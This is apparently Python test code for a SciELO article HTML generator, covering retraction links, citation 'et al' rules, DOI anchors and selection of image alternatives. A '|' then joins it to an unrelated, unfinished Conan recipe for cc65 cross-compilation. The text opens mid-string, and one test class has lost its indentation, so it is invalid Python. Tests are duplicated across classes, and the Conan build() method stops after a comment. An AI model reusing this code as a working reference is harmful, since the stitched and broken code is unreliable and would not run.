                  xmlns:mml="http://www.w3.org/1998/Math/MathML"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/2236-8906-34/2018-retratacao</article-id>
                      <related-article ext-link-type="scielo-aid" id="r01" related-article-type="partial-retraction"
                      xlink:href="12345567799"/>
                    </article-meta>
                  </front>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('pt'), encoding='unicode', method='html')
    self.assertIn(u'Esta retratação retrata o documento', rendered)
    self.assertIn(
        u'<ul><li><a href="/article/12345567799" target="_blank">12345567799</a></li>',
        rendered
    )
def test_presents_in_how_to_cite_collab_and_et_al_if_contrib_quantity_is_greater_than_3(self):
    """With more than 3 contributors, how-to-cite shows the collab name plus 'et al'."""
    xml = u"""<article article-type="partial-retraction" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="pt"
                  xmlns:mml="http://www.w3.org/1998/Math/MathML"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/2175-7860201869402</article-id>
                      <article-categories>
                        <subj-group subj-group-type="heading">
                          <subject>GSPC - Global Strategy for Plant Conservation</subject>
                        </subj-group>
                      </article-categories>
                      <title-group>
                        <article-title>Brazilian Flora 2020: Innovation and collaboration to meet Target 1 of the Global Strategy for Plant Conservation (GSPC)</article-title>
                      </title-group>
                      <contrib-group>
                        <contrib contrib-type="author">
                          <collab>The Brazil Flora Group</collab>
                          <xref ref-type="aff" rid="aff1"/>
                        </contrib>
                        <contrib contrib-type="author">
                          <name>
                            <surname>Filardi</surname>
                            <given-names>Fabiana L. Ranzato</given-names>
                          </name>
                          <xref ref-type="aff" rid="aff1"/>
                          <xref ref-type="corresp" rid="c1">1</xref>
                        </contrib>
                        <contrib contrib-type="author">
                          <name>
                            <surname>Barros</surname>
                            <given-names>Fábio de</given-names>
                          </name>
                          <xref ref-type="aff" rid="aff1"/>
                        </contrib>
                        <contrib contrib-type="author">
                          <name>
                            <surname>Bicudo</surname>
                            <given-names>Carlos E.M.</given-names>
                          </name>
                          <xref ref-type="aff" rid="aff1"/>
                        </contrib>
                        <contrib contrib-type="author">
                          <name>
                            <surname>Cavalcanti</surname>
                            <given-names>Taciana B.</given-names>
                          </name>
                          <xref ref-type="aff" rid="aff1"/>
                        </contrib>
                      </contrib-group>
                      <author-notes>
                        <corresp id="c1">
                          <label>1</label>Author for correspondence: <email>rafaela@jbrj.gov.br</email>, <email>floradobrasil2020@jbrj.gov.br</email>
                        </corresp>
                        <fn fn-type="edited-by">
                          <p>Editor de área: Dr. Renato Pereira</p>
                        </fn>
                      </author-notes>
                      <pub-date pub-type="epub-ppub">
                        <season>Oct-Dec</season>
                        <year>2018</year>
                      </pub-date>
                      <volume>69</volume>
                      <issue>04</issue>
                      <fpage>1513</fpage>
                      <lpage>1527</lpage>
                    </article-meta>
                  </front>
                </article>"""
    tree = etree.parse(io.BytesIO(xml.encode('utf-8')))
    generator = domain.HTMLGenerator.parse(tree, valid_only=False)
    rendered = etree.tostring(
        generator.generate('pt'), encoding='unicode', method='html')
    self.assertIn(
        u'The Brazil Flora Group et al',
        rendered
    )
def test_article_meta_doi_should_be_an_explicit_link(self):
    """The article-meta DOI must be rendered as exactly one anchor element.

    Fix: ``assertEquals`` is a deprecated alias that was removed in
    Python 3.12; use ``assertEqual`` instead.
    """
    sample = u"""<article article-type="research-article" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="en"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/r</article-id>
                    </article-meta>
                  </front>
                </article>"""
    fp = io.BytesIO(sample.encode("utf-8"))
    et = etree.parse(fp)
    html = domain.HTMLGenerator.parse(et, valid_only=False).generate("en")
    html_string = etree.tostring(html, encoding="unicode", method="html")
    # XPath over the lxml tree (not the serialized string) finds the DOI anchor.
    article_header_dois = html.xpath("//span[contains(@class, 'group-doi')]//a[contains(@class, '_doi')]")
    self.assertEqual(len(article_header_dois), 1)
class HTMLGeneratorDispFormulaTests(unittest.TestCase):
    """Graphic-alternative selection for <disp-formula>, <fig> and <table-wrap>.

    Each test fills the two placeholders of ``self.sample`` — ``{graphic1}``
    (a block-level element) and ``{graphic2}`` (inline content) — and checks
    which <graphic> alternative the HTML generator picks:

    * ``specific-use="scielo-web"`` alternatives are preferred for display;
    * ``content-type="scielo-20x20"`` alternatives are used as thumbnails;
    * ``.tif``/``.tiff`` hrefs are rewritten to ``.jpg`` when no better
      alternative exists.
    """
    def setUp(self):
        # Article skeleton; tests inject graphics via str.format on the
        # {graphic1}/{graphic2} placeholders before parsing.
        self.sample = u"""<article article-type="research-article" dtd-version="1.1"
                  specific-use="sps-1.8" xml:lang="pt"
                  xmlns:mml="http://www.w3.org/1998/Math/MathML"
                  xmlns:xlink="http://www.w3.org/1999/xlink">
                  <front>
                    <article-meta>
                      <article-id pub-id-type="doi">10.1590/2175-7860201869402</article-id>
                      <title-group>
                        <article-title>
                          Article Title
                        </article-title>
                      </title-group>
                      <pub-date pub-type="epub-ppub">
                        <season>Oct-Dec</season>
                        <year>2018</year>
                      </pub-date>
                      <supplementary-material mimetype="application"
                                              mime-subtype="tiff"
                                              xlink:href="1234-5678-rctb-45-05-0110-suppl02.tif"/>
                    </article-meta>
                  </front>
                  <body>
                    <sec>
                      <p>The Eh measurements... <xref ref-type="disp-formula" rid="e01">equation 1</xref>(in mV):</p>
                      {graphic1}
                      <p>We also used an... {graphic2}.</p>
                    </sec>
                  </body>
                </article>"""

    def test_graphic_images_alternatives_must_prioritize_scielo_web_in_disp_formula(self):
        """In a disp-formula, the scielo-web PNG wins over the plain TIFF."""
        graphic1 = """
        <disp-formula id="e01">
          <alternatives>
            <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
            <graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
            <graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
          </alternatives>
        </disp-formula>
        """
        graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff" /><inline-graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        self.assertIsNotNone(
            html.find(
                '//div[@class="formula-container"]//img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
            )
        )
        self.assertIsNotNone(
            html.find('//p//img[@src="1234-5678-rctb-45-05-0110-e02.png"]')
        )

    def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_disp_formula(self):
        """Without alternatives, .tif/.tiff hrefs are rewritten to .jpg."""
        graphic1 = """
        <disp-formula id="e01">
          <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
        </disp-formula>
        """
        graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        self.assertIsNotNone(
            html.find(
                '//div[@class="formula-container"]//img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
            )
        )
        self.assertIsNotNone(
            html.find('//p//img[@src="1234-5678-rctb-45-05-0110-e02.jpg"]')
        )

    def test_graphic_images_alternatives_must_prioritize_scielo_web_and_content_type_in_fig_when_thumb(self):
        """The fig thumbnail uses the scielo-20x20 alternative as background image."""
        graphic1 = """
        <fig id="e01">
          <alternatives>
            <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
            <graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
            <graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
          </alternatives>
        </fig>
        """
        graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff" /><inline-graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        thumb_tag = html.xpath(
            '//div[@class="articleSection"]/div[@class="row fig"]//a[@data-toggle="modal"]/'
            'div[@class="thumb" and @style="background-image: url(1234-5678-rctb-45-05-0110-e01.thumbnail.jpg);"]'
        )
        self.assertTrue(len(thumb_tag) > 0)

    def test_graphic_images_alternatives_must_prioritize_scielo_web_attribute_in_modal(self):
        """The modal shows the scielo-web alternative, not the first graphic."""
        graphic1 = """
        <fig id="e01">
          <alternatives>
            <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
            <graphic xlink:href="1234-5678-rctb-45-05-0110-e03.png" specific-use="scielo-web" />
            <graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
          </alternatives>
        </fig>
        """
        graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        thumb_tag = html.xpath(
            '//div[@id="ModalFige01"]//img[@src="1234-5678-rctb-45-05-0110-e03.png"]'
        )
        self.assertTrue(len(thumb_tag) > 0)

    def test_graphic_images_alternatives_must_get_first_graphic_in_modal_when_not_scielo_web_and_not_content_type_atribute(self):
        """With no scielo-web full-size alternative, the first graphic is used."""
        graphic1 = """
        <fig id="e01">
          <alternatives>
            <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png"/>
            <graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
          </alternatives>
        </fig>
        """
        graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        thumb_tag = html.xpath(
            '//div[@id="ModalFige01"]//img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
        )
        self.assertTrue(len(thumb_tag) > 0)

    def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_fig(self):
        """Fig thumbnail falls back to the .jpg rewrite of a lone .tif graphic."""
        graphic1 = """
        <fig id="e01">
          <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
        </fig>
        """
        graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        thumb_tag = html.xpath(
            '//div[@class="articleSection"]/div[@class="row fig"]//a[@data-toggle="modal"]/'
            'div[@class="thumb" and @style="background-image: url(1234-5678-rctb-45-05-0110-e01.jpg);"]'
        )
        self.assertTrue(len(thumb_tag) > 0)

    def test_graphic_images_alternatives_must_prioritize_scielo_web_in_modal_disp_formula(self):
        """The disp-formula modal body shows the scielo-web PNG."""
        graphic1 = """
        <disp-formula id="e01">
          <alternatives>
            <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
            <graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
            <graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
          </alternatives>
        </disp-formula>
        """
        graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        modal_body = html.find(
            '//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
        )
        self.assertIsNotNone(modal_body)

    def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_modal_disp_formula(self):
        """The disp-formula modal falls back to the .jpg rewrite of a .tif."""
        graphic1 = """
        <disp-formula id="e01">
          <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
        </disp-formula>
        """
        graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        modal_body = html.find(
            '//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
        )
        self.assertIsNotNone(modal_body)

    def test_graphic_images_alternatives_must_prioritize_scielo_web_in_modal_fig(self):
        """The fig modal body shows the scielo-web PNG."""
        graphic1 = """
        <fig id="e01">
          <alternatives>
            <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
            <graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
            <graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
          </alternatives>
        </fig>
        """
        graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        modal_body = html.find(
            '//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
        )
        self.assertIsNotNone(modal_body)

    def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_modal_fig(self):
        """The fig modal falls back to the .jpg rewrite of a .tif."""
        graphic1 = """
        <fig id="e01">
          <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
        </fig>
        """
        graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        modal_body = html.find(
            '//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
        )
        self.assertIsNotNone(modal_body)

    def test_graphic_images_alternatives_must_prioritize_scielo_web_in_modal_table_wrap(self):
        """The table-wrap modal body shows the scielo-web PNG."""
        graphic1 = """
        <table-wrap id="e01">
          <alternatives>
            <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
            <graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
            <graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
          </alternatives>
        </table-wrap>
        """
        graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        modal_body = html.find(
            '//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
        )
        self.assertIsNotNone(modal_body)

    def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_modal_table_wrap(self):
        """The table-wrap modal falls back to the .jpg rewrite of a .tif."""
        graphic1 = """
        <table-wrap id="e01">
          <graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
        </table-wrap>
        """
        graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
        fp = io.BytesIO(
            self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
        )
        et = etree.parse(fp)
        html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
        modal_body = html.find(
            '//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
        )
        self.assertIsNotNone(modal_body)
class HTMLGeneratorFigTests(unittest.TestCase):
def setUp(self):
self.sample = u"""<article article-type="research-article" dtd-version="1.1"
specific-use="sps-1.8" xml:lang="pt"
xmlns:mml="http://www.w3.org/1998/Math/MathML"
xmlns:xlink="http://www.w3.org/1999/xlink">
<front>
<article-meta>
<article-id pub-id-type="doi">10.1590/2175-7860201869402</article-id>
<title-group>
<article-title>
Article Title
</article-title>
</title-group>
<pub-date pub-type="epub-ppub">
<season>Oct-Dec</season>
<year>2018</year>
</pub-date>
<supplementary-material mimetype="application"
mime-subtype="tiff"
xlink:href="1234-5678-rctb-45-05-0110-suppl02.tif"/>
</article-meta>
</front>
<body>
<sec>
<p>The Eh measurements... <xref ref-type="disp-formula" rid="e01">equation 1</xref>(in mV):</p>
{graphic1}
<p>We also used an... {graphic2}.</p>
</sec>
</body>
</article>"""
def test_graphic_images_alternatives_must_prioritize_scielo_web_and_content_type_in_fig_when_thumb(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff" /><inline-graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="articleSection"]/div[@class="row fig"]//a[@data-toggle="modal"]/'
'div[@class="thumb" and @style="background-image: url(1234-5678-rctb-45-05-0110-e01.thumbnail.jpg);"]'
)
self.assertTrue(len(thumb_tag) > 0
)
def test_graphic_images_alternatives_must_prioritize_scielo_web_attribute_in_modal(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic xlink:href="1234-5678-rctb-45-05-0110-e03.png" specific-use="scielo-web" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@id="ModalFige01"]//img[@src="1234-5678-rctb-45-05-0110-e03.png"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_images_alternatives_must_get_first_graphic_in_modal_when_not_scielo_web_and_not_content_type_atribute(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png"/>
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<alternatives><inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.png" /></alternatives>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@id="ModalFige01"]//img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_fig(self):
graphic1 = """
<fig id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="articleSection"]/div[@class="row fig"]//a[@data-toggle="modal"]/'
'div[@class="thumb" and @style="background-image: url(1234-5678-rctb-45-05-0110-e01.jpg);"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_graphic_images_alternatives_must_prioritize_scielo_web_in_modal_fig(self):
graphic1 = """
<fig id="e01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.thumbnail.jpg" />
</alternatives>
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.png"]'
)
self.assertIsNotNone(modal_body)
def test_graphic_tiff_image_href_must_be_replaces_by_jpeg_file_extension_in_modal_fig(self):
graphic1 = """
<fig id="e01">
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
</fig>
"""
graphic2 = '<inline-graphic xlink:href="1234-5678-rctb-45-05-0110-e02.tiff"/>'
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
modal_body = html.find(
'//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
)
self.assertIsNotNone(modal_body)
def test_article_text_alternatives_mode_file_location_thumb_must_choose_graphic_with_xlink_href_not_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href=""/>
<graphic xlink:href="https://minio.scielo.br/documentstore/1678-992X/Wfy9dhFgfVFZgBbxg4WGVQM/a.jpg"/>
<graphic xlink:href="https://minio.scielo.br/documentstore/1678-992X/Wfy9dhFgfVFZgBbxg4WGVQM/b.jpg"/>
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="row fig"]'
'//div[@class="thumb" and @style="background-image: url('
'https://minio.scielo.br/documentstore/1678-992X/'
'Wfy9dhFgfVFZgBbxg4WGVQM/a.jpg'
');"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_article_text_alternatives_mode_file_location_thumb_must_choose_graphic_with_scielo_web_and_no_content_type_because_xlink_href_is_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.tif" />
<graphic specific-use="scielo-web" xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="row fig"]'
'//div[@class="thumb" and @style="background-image: url('
'1234-5678-rctb-45-05-0110-e01.png'
');"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_article_text_alternatives_mode_file_location_thumb_must_choose_graphic_with_no_scielo_web_and_no_content_type_because_xlink_href_is_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
<graphic specific-use="scielo-web" xlink:href="" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="row fig"]'
'//div[@class="thumb" and @style="background-image: url('
'1234-5678-rctb-45-05-0110-e01.jpg'
');"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_article_text_alternatives_mode_file_location_thumb_must_choose_graphic_with_no_scielo_web_and_no_content_type_because_xlink_href_is_absent(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
<graphic specific-use="scielo-web" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
thumb_tag = html.xpath(
'//div[@class="row fig"]'
'//div[@class="thumb" and @style="background-image: url('
'1234-5678-rctb-45-05-0110-e01.jpg'
');"]'
)
self.assertTrue(len(thumb_tag) > 0)
def test_article_text_alternatives_mode_file_location_must_choose_graphic_with_xlink_href_not_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="" />
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
img = html.xpath(
'//div[@class="modal-body"]/img[@src="'
'1234-5678-rctb-45-05-0110-e01.png'
'"]'
)
self.assertTrue(len(img) > 0)
img = html.xpath(
'//div[@class="modal-body"]/img[@src="'
'1234-5678-rctb-45-05-0110-e01.jpg'
'"]'
)
self.assertTrue(len(img) == 0)
def test_article_text_alternatives_chooses_graphic_with_no_scielo_web_and_no_content_type_because_xlink_href_is_empty(self):
graphic1 = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.png" />
<graphic specific-use="scielo-web" xlink:href="" />
<graphic specific-use="scielo-web" content-type="scielo-20x20" xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
</alternatives>
</fig>
"""
graphic2 = ""
fp = io.BytesIO(
self.sample.format(graphic1=graphic1, graphic2=graphic2).encode('utf-8')
)
et = etree.parse(fp)
html = domain.HTMLGenerator.parse(et, valid_only=False).generate('pt')
img_tag = html.xpath(
'//div[@class="modal-body"]/img[@src="'
'1234-5678-rctb-45-05-0110-e01.png'
'"]'
)
self.assertTrue(len(img_tag) > 0)
def test_article_text_alternatives_chooses_graphic_with_no_scielo_web_and_no_content_type_because_xlink_href_is_absent(self):
    """Fall back to the plain graphic when the scielo-web one has no href at all.

    A scielo-web alternative without any @xlink:href is unusable, so the
    plain .jpg graphic must end up in the modal body.
    """
    fig_markup = """
<fig id="f01">
<alternatives>
<graphic xlink:href="1234-5678-rctb-45-05-0110-e01.jpg" />
<graphic specific-use="scielo-web" />
</alternatives>
</fig>
"""
    xml_file = io.BytesIO(
        self.sample.format(graphic1=fig_markup, graphic2="").encode('utf-8')
    )
    generated = domain.HTMLGenerator.parse(
        etree.parse(xml_file), valid_only=False
    ).generate('pt')
    chosen = generated.xpath(
        '//div[@class="modal-body"]/img[@src="1234-5678-rctb-45-05-0110-e01.jpg"]'
    )
    self.assertTrue(len(chosen) > 0)
|
from conans import ConanFile, tools
import os
import shutil
class TestPackageConan(ConanFile):
    """Test package: cross-compiles a small C + assembly program with the
    cc65 suite (cc65 / ca65-style assembler / ld65) for each retro target
    and checks that a binary was produced for each one."""
    settings = "os", "arch", "compiler", "build_type"
    exports_sources = "hello.c", "text.s"
    # One binary is built per target platform configuration.
    _targets = ("c64", "apple2")

    def build(self):
        # The cc65 tools run on the build machine, so skip when cross-building.
        if not tools.cross_building(self.settings):
            # Copy the exported sources next to the build so relative paths work.
            for src in self.exports_sources:
                shutil.copy(os.path.join(self.source_folder, src), os.path.join(self.build_folder, src))
            for target in self._targets:
                output = "hello_{}".format(target)
                # Per-target scratch directory for intermediate .s/.o files.
                tools.mkdir(target)
                try:
                    # Try removing the output file to give confidence it is created by cc65
                    os.unlink(output)
                except FileNotFoundError:
                    pass
                # Compile C -> assembly, assemble both sources, then link against
                # the target runtime library ({t}.lib). Tool paths come from the
                # CC65/AS65/LD65 environment variables set by the recipe.
